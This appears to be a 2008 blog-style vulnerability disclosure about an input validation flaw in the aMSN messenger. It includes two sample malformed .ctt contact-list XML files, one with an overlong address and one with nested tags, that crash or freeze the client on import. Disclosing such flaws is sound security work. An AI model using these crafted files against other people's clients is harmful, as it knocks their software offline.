aMSN Input Validation Error

January 26, 2008

Risk: Low
Tipology: Input Validation Error

All aMSN versions, both on Windows and Linux platorms.

As Microsoft MSN, aMSN have a nice feature for Exporting and Importing the list of
contacts you have.

This list is dumped into an XML file (file extension .ctt), with this structure

——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact> your_contact@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
——————————————————————–

aMSN does not Validate correctly the Contacts you insert, precisely does not parse
the format of this file, and suddenly when you import a malformed Contact List it
shutdown

here an example of malformed input list

——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
——————————————————————-

Or another possibility

——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact><contact><contact><contact><contact></contact></contact><contact></contact></contact></contact></contact>
</contact>
</contactlist>
</service>
</messenger>
——————————————————————-

This will cause a freeze of aMSN..

If you use the same “trick” with Ms Messenger, a MessageBox will advice you of the malformed
file 😉

See you to the next post